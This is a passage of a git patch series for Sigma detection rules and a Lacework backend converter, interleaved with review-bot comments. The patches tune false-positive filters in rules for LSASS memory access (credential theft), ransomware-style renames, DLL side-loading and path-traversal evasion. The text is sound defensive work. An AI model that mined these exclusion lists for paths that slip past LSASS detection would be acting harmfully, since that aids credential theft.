Cloudtrail source: CloudTrailRawEvents fieldMap: - sigmaField: eventName @@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load( alertProfile: LW_CloudTrail_Alerts product.categories: linux.file_create: - evaluatorId: - source: LW_HE_FILES + sources: + - LW_HE_FILES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60 
@@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load( - OWNER_USERNAME - FILE_CREATED_TIME alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation + linux.network_connection: + sources: + - LW_HA_CONNECTION_SUMMARY as HACM + - array_to_rows(ENDPOINT_DETAILS) as (EP_PA) + fieldMap: + - sigmaField: Image + laceworkField: EXE_PATH + matchType: exact + action: selfjoin + selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }} + - sigmaField: DestinationIp + laceworkField: EP_PA:dst_ip_addr + matchType: exact + - sigmaField: DestinationHostname + laceworkField: + matchType: exact + action: raise + returns: + - HACM.BATCH_END_TIME + - HACM.BATCH_START_TIME + - HACM.DST_ENTITY_ID + - HACM.DST_ENTITY_TYPE + - HACM.DST_IN_BYTES + - HACM.DST_OUT_BYTES + - HACM.ENDPOINT_DETAILS + - HACM.NUM_CONNS + - HACM.SRC_ENTITY_ID + - HACM.SRC_ENTITY_TYPE + - HACM.SRC_IN_BYTES + - HACM.SRC_OUT_BYTES + alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation linux.process_creation: - evaluatorId: - source: LW_HE_PROCESSES + sources: + - LW_HE_PROCESSES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60 
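Review bot: The `selfJoinFilter` for the `Image` field hardcodes `EXE_PATH like '%/bin/bash'` inside the shared backend config, so unless the backend rewrites that fragment from the rule's `Image` value, every `linux.network_connection` rule will self-join on bash processes regardless of what the rule selects — it reads like a test value left in. If the filter is meant to be templated, mark it, e.g. `# placeholder: substituted from the rule's Image condition`, or parameterise it with a field reference the way `laceworkField: EP_PA:dst_ip_addr` does. `DestinationHostname` has an empty `laceworkField:` with `action: raise`; a one-line comment stating that the empty value is intentional would save the next reader from treating it as a bug. The config literal sits inside a `yaml.load(` call whose `Loader` argument is outside the hunk; worth confirming it is a safe loader now that the embedded document is growing.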
@@ -489,22 +519,18 @@ class LaceworkQuery: self.logsource_config = self.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator ID - self.evaluator_id = self.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Query ID + # 3. Get Query ID self.title, self.query_id = self.get_query_id(rule) - # 5. Get Query Source - self.query_source = self.get_query_source( + # 4. Get Query Source + self.query_sources = self.get_query_sources( self.logsource_name, self.logsource_config) - # 6. Get Query Returns + # 5. Get Query Returns self.returns = self.get_query_returns( self.logsource_name, self.logsource_config) - # 7. Get Query Text + # 6. Get Query Text self.query_text = self.get_query_text(backend, conditions) def get_query_text(self, backend, rule_conditions): @@ -539,8 +565,9 @@ class LaceworkQuery: ' {source}\n' ' }}' ) + return source_block_template.format( - source=self.query_source + source=',\n '.join(self.query_sources) ) def get_query_return_block(self): @@ -555,7 +582,6 @@ class LaceworkQuery: def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'queryId': 'query_id', 'queryText': 'query_text' }.items(): @@ -623,12 +649,6 @@ class LaceworkQuery: return logsource_config - @staticmethod - def get_evaluator_id(logsource_name, logsource_config): - # 3. validate service has an evaluatorId mapping - evaluator_id = safe_get(logsource_config, 'evaluatorId', str) - return evaluator_id if evaluator_id else None - @staticmethod def get_query_id(rule): title = safe_get(rule, 'title', str) or 'Unknown' 
@@ -638,15 +658,18 @@ class LaceworkQuery: return title, query_id @staticmethod - def get_query_source(logsource_name, logsource_config): + def get_query_sources(logsource_name, logsource_config) -> list[str]: # 4. validate service has a source mapping source = safe_get(logsource_config, 'source', str) + sources = safe_get(logsource_config, 'sources', list) - if not source: - raise BackendError( - f'Lacework backend could not determine source for logsource {logsource_name}') + if sources: + return sources + elif source: + return [source] - return source + raise BackendError( + f'Lacework backend could not determine source for logsource {logsource_name}') @staticmethod def get_query_returns(logsource_name, logsource_config): 
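Review bot: The new `-> list[str]` annotation on `get_query_sources` is evaluated at definition time and raises `TypeError` on Python 3.8 and earlier unless the module has `from __future__ import annotations`, which the hunk does not show; if the backend still supports those interpreters, use `typing.List[str]` or add the future import. The body returns `sources` unchecked beyond `safe_get(..., list)`, so a config entry with a non-string element only surfaces later as a `TypeError` in the `join` in `get_query_source_block`, and an empty list is falsy and silently falls through to the single-`source` path; checking `all(isinstance(s, str) for s in sources)` here keeps the failure at the config boundary with the existing `BackendError` message. The error text still says "source", which now covers both keys — fine, but `'source' or 'sources'` would be more precise.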
@@ -703,42 +726,37 @@ class LaceworkPolicy: self.logsource_config = LaceworkQuery.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator Id - self.evaluator_id = LaceworkQuery.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Title - # 5. Get Query ID + # 3. Get Title + # 4. Get Query ID self.title, self.query_id = LaceworkQuery.get_query_id(rule) - # 6. Get Enabled + # 5. Get Enabled self.enabled = False - # 7. Get Policy Type + # 6. Get Policy Type self.policy_type = 'Violation' - # 8. Get Alert Enabled + # 7. Get Alert Enabled self.alert_enabled = False - # 9. Get Alert Profile + # 8. Get Alert Profile self.alert_profile = self.get_alert_profile( self.logsource_name, self.logsource_config) - # 10. Get Limit + # 9. Get Limit self.limit = 1000 - # 11. Get Severity + # 10. Get Severity self.severity = safe_get(rule, 'level', str) or 'medium' - # 12. Get Description + # 11. Get Description self.description = safe_get(rule, 'description', str) - # 13. Get Remediation + # 12. Get Remediation self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'title': 'title', 'enabled': 'enabled', 'policyType': 'policy_type', From fda2ca4308d826ec7ee20df3b41e2cdf37330ab2 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 17:20:19 -0700 Subject: [PATCH 072/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Fix FP with Citrix launcher --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..e63542221 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml 
+++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -24,8 +24,10 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high From 411d79017eb8060b380bc977ccb43f61012cd112 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:33:16 -0700 Subject: [PATCH 073/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Changed to simpler CommandLine|contains and updated modified date. --- ...roc_creation_win_commandline_path_traversal_evasion.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index e63542221..c0d988789 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 
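Review bot: The new `falsepositives` entry `- Citrix` is too generic to act on — the filter added just above is specific to one binary, so the documentation should be too: `- Citrix Virtual Smart Card launcher (Citrix.Authentication.VirtualSmartcard.Launcher.exe)`. A reader triaging a hit on another Citrix component would otherwise be misled into treating it as a known benign case.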
@@ -24,8 +24,9 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' - - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 5fbebce70351d6bd68249d839d534cdb9f7d2b4e Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:45:45 -0700 Subject: [PATCH 074/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Removed extra space after the hyphen --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index c0d988789..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -25,8 +25,8 @@ detection: CommandLine|contains: '.exe\..\' filter: CommandLine|contains: - - '\Google\Drive\googledrivesync.exe\..\' - - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 59530f49d47fde2b8b9c89c86f94811c8c040bfc Mon Sep 17 00:00:00 2001 
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:53:39 +0200 Subject: [PATCH 075/120] Fix more FP in testing --- ...win_sysinternals_sdelete_file_deletion.yml | 30 ++++++---- .../file_event_win_susp_desktop_ini.yml | 35 ++++++----- .../file_rename_win_ransomware.yml | 11 ++-- .../image_load_side_load_antivirus.yml | 4 +- ...oad_side_load_from_non_system_location.yml | 3 +- .../image_load_susp_python_image_load.yml | 37 ++++++------ .../net_connection_win_python.yml | 21 ++++++- ...ion_win_susp_outbound_smtp_connections.yml | 7 ++- ...ccess_win_direct_syscall_ntopenprocess.yml | 6 ++ ...proc_access_win_rare_proc_access_lsass.yml | 7 ++- ...win_susp_proc_access_lsass_susp_source.yml | 9 +-- ...access_win_shellcode_inject_msf_empire.yml | 32 +++++++++- ...proc_creation_win_expand_cabinet_files.yml | 6 +- .../proc_creation_win_mstsc.yml | 3 +- ...proc_creation_win_susp_codepage_lookup.yml | 3 +- ...ete_removal_com_hijacking_registry_key.yml | 59 ++++++++++--------- 16 files changed, 176 insertions(+), 97 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..03798c09f 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
@@ -4,22 +4,26 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + # This event occurs when (un)installing wireshark + TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete + - An FP may occure if the installation directory of wireshark is changed level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml 
@@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 
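Review bot: `filter_jetbrains` is added to the desktop.ini rule but `falsepositives` still lists only SCCM and read-only ACL cases; record the new known-benign source so analysts can recognise it, e.g. `- JetBrains Toolbox extracting application updates (7z.exe under %LOCALAPPDATA%\JetBrains\Toolbox\bin)`. Note that `7z.exe` here lives in a user-writable directory, so the paired `TargetFilename|contains: '\JetBrains\apps\'` condition is what keeps the exclusion narrow — a short comment saying so, e.g. `# keep both conditions: Image alone is a user-writable path`, would stop a future edit from splitting them.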
@@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..f2198619d 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -42,5 +42,7 @@ detection: - 'C:\Program Files (x86)\McAfee\' condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index de8fc8740..922ae270e 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml 
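Review bot: `filter_anaconda` in the ransomware rule pins `TargetFilename|startswith: 'C:\ProgramData\Anaconda3\'`, which is the all-users install location only; if Anaconda is installed per user in an environment the same `.c~` renames land under the user profile and keep alerting. Either state that scope in a comment (`# all-users Anaconda install only; per-user installs are not covered`) or add the per-user path explicitly rather than loosening the anchor to a bare `|contains`, which would also exempt a user-writable location. In the `image_load_side_load_antivirus` hunk on the same line, the new falsepositives text has `pulgin` → `plugin` and `if a lot FPs` → `if a lot of FPs`.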
@@ -416,8 +416,7 @@ detection:
 - 'C:\Windows\SysWOW64\'
 - 'C:\Windows\WinSxS\'
 - 'C:\Windows\SoftwareDistribution\'
- filter_systemp:
- ImageLoaded|startswith: 'C:\Windows\SystemTemp\'
+ - 'C:\Windows\SystemTemp\'
 filter_appvpolicy:
 ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll
 Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml
index 79b4ceff8..8ddb710a6 100644
--- a/rules/windows/image_load/image_load_susp_python_image_load.yml
+++ b/rules/windows/image_load/image_load_susp_python_image_load.yml
@@ -6,26 +6,27 @@ date: 2020/05/03
 modified: 2021/12/05
 author: Patrick St. John, OTR (Open Threat Research)
 tags:
- - attack.defense_evasion
- - attack.t1027.002
+ - attack.defense_evasion
+ - attack.t1027.002
 references:
- - https://www.py2exe.org/
- - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
+ - https://www.py2exe.org/
+ - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
 logsource:
- product: windows
- category: image_load
+ product: windows
+ category: image_load
 detection:
- selection:
- Description: 'Python Core'
- filter:
- - Image|contains:
- - 'Python' # FPs with python38.dll, python.exe etc.
- - Image|startswith:
- - 'C:\Program Files\'
- - 'C:\Program Files (x86)\'
- condition: selection and not filter
+ selection:
+ Description: 'Python Core'
+ filter:
+ - Image|contains:
+ - 'Python' # FPs with python38.dll, python.exe etc.
+ - Image|startswith:
+ - 'C:\Program Files\'
+ - 'C:\Program Files (x86)\'
+ condition: selection and not filter
 fields:
- - Description
+ - Description
 falsepositives:
- - Legit Py2Exe Binaries
-level: medium
\ No newline at end of file
+ - Legit Py2Exe Binaries
+ - Known false positive caused with anaconda installation/update
+level: medium
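Review bot: `image_load_susp_python_image_load.yml` gains a new falsepositives entry and a re-indented detection block but keeps `modified: 2021/12/05` (the first context line of the hunk), whereas the other rules touched by this commit bump `modified` to `2022/09/20` or `2022/09/21`; set `modified: 2022/09/21`. The new entry `- Known false positive caused with anaconda installation/update` documents a case the existing `filter` does not name — if the triggering images are known, a dedicated `filter_anaconda` with a comment would be more useful to operators than a note they have to act on by hand.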
diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml
index 5e0ec8245..bc3737dcb 100644
--- a/rules/windows/network_connection/net_connection_win_python.yml
+++ b/rules/windows/network_connection/net_connection_win_python.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python
 - https://pypi.org/project/scapy/
 date: 2021/12/10
-modified: 2022/08/12
+modified: 2022/09/20
 logsource:
 category: network_connection
 product: windows
@@ -15,7 +15,24 @@ detection:
 selection:
 Initiated: 'true'
 Image|contains: python
- condition: selection
+ filter_conda:
+ # Related to anaconda updates. Command example: "conda update conda"
+ # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
+ ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe
+ CommandLine|contains|all:
+ - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py'
+ - 'update'
+ filter_conda_jupyter_notebook:
+ # Related to anaconda opening an instance of Jupyter Notebook
+ # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
+ ParentImage: C:\ProgramData\Anaconda3\python.exe
+ CommandLine|contains|all:
+ - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'
+ filter_local_communication:
+ # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances
+ DestinationIp: 127.0.0.1
+ SourceIp: 127.0.0.1
+ condition: selection and not 1 of filter_*
 falsepositives:
 - Legitimate python script
 level: medium
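Review bot: `filter_local_communication` exempts only the IPv4 loopback pair `127.0.0.1`/`127.0.0.1`; the same local Jupyter or python socket bound to IPv6 loopback is logged as `::1` and will still alert, so decide explicitly — list both addresses under `DestinationIp`/`SourceIp`, or extend the comment to say IPv6 loopback is intentionally left in scope. In `filter_conda_jupyter_notebook`, `CommandLine|contains|all:` has a single value, so the `|all` modifier is a no-op and `CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'` reads clearer. The long comment on the loopback filter also misspells `openning` (`opening`).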
diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml
index 89a6e4bf1..7612f4a7b 100644
--- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml
+++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml
@@ -9,7 +9,7 @@ references:
 - https://www.ietf.org/rfc/rfc2821.txt
 author: frack113
 date: 2022/01/07
-modified: 2022/02/16
+modified: 2022/09/21
 logsource:
 category: network_connection
 product: windows
@@ -27,7 +27,10 @@ detection:
 - \outlook.exe
 filter_mailserver:
 Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\'
- condition: selection and not 1 of filter*
+ filter_outlook:
+ Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_'
+ Image|endswith: '\HxTsr.exe'
+ condition: selection and not 1 of filter_*
 falsepositives:
 - Other SMTP tools
 level: medium
diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
index c0a3ec60a..30041efde 100755
--- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
+++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
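Review bot: `filter_outlook` excludes `HxTsr.exe` from the `microsoft.windowscommunicationsapps_` package, which appears to be the built-in Mail and Calendar app's sync process rather than Outlook, so the filter name is misleading and `falsepositives` still says only `- Other SMTP tools`. Rename it to `filter_windows_mail` and add `- Windows Mail and Calendar app (HxTsr.exe) sending mail` so analysts recognise the benign case without reading the detection block.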
@@ -44,6 +44,12 @@ detection:
 falsepositive10: # MS Teams
 TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe'
 SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe'
+ falsepositives11:
+ TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe'
+ SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe'
+ falsepositives12:
+ TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe'
+ SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe'
 falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider
 Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls'
 condition: selection and not 1 of falsepositive*
diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
index 26a7bf029..e9f723900 100644
--- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
+++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)
 author: Florian Roth
 date: 2022/03/13
-modified: 2022/09/18
+modified: 2022/09/20
 references:
 - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
 - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
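Review bot: The two new filters are named `falsepositives11` and `falsepositives12` while every existing sibling uses the singular `falsepositive<N>` (`falsepositive10` directly above); `1 of falsepositive*` still picks them up, but the mix reads like a typo — rename to `falsepositive11:` / `falsepositive12:`. The Teams filter carries an inline `# MS Teams` note, whereas the new ones do not record why the `backgroundTaskHost.exe` and `CCleanerBrowser.exe` self-access pairs are considered benign; add the same kind of inline comment, e.g. `falsepositive11: # backgroundTaskHost self-access`.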
@@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' filter_xampp: SourceImage|endswith: '\xampp-control.exe' GrantedAccess: '0x410' diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' 
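Review bot: The new `'\JetBrains\Toolbox\bin\jetbrains-toolbox.exe'` exclusion (hunk `@@ -92` of the rare-access rule and `@@ -65` of the susp-source rule) is a pure suffix match on a binary that lives under the user-writable `%LOCALAPPDATA%` tree, so it exempts any process that reproduces that relative path from the LSASS-access detection. In the susp-source hunk the exclusion is at least tied to `GrantedAccess: '0x410'`; in the rare-access hunk the context ends at `filter_xampp:` so I cannot see whether this list is similarly constrained — if it is not, pair it with the access mask and record the trade-off, e.g. `# JetBrains Toolbox updater runs from %LOCALAPPDATA%; suffix-only exclusion, review periodically`. While touching that list: the pre-existing entry `'\WebEx\WebexHost.exe '` appears to carry a trailing space inside the quotes, which would make its `endswith` never match — confirm against the file and drop it if so.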
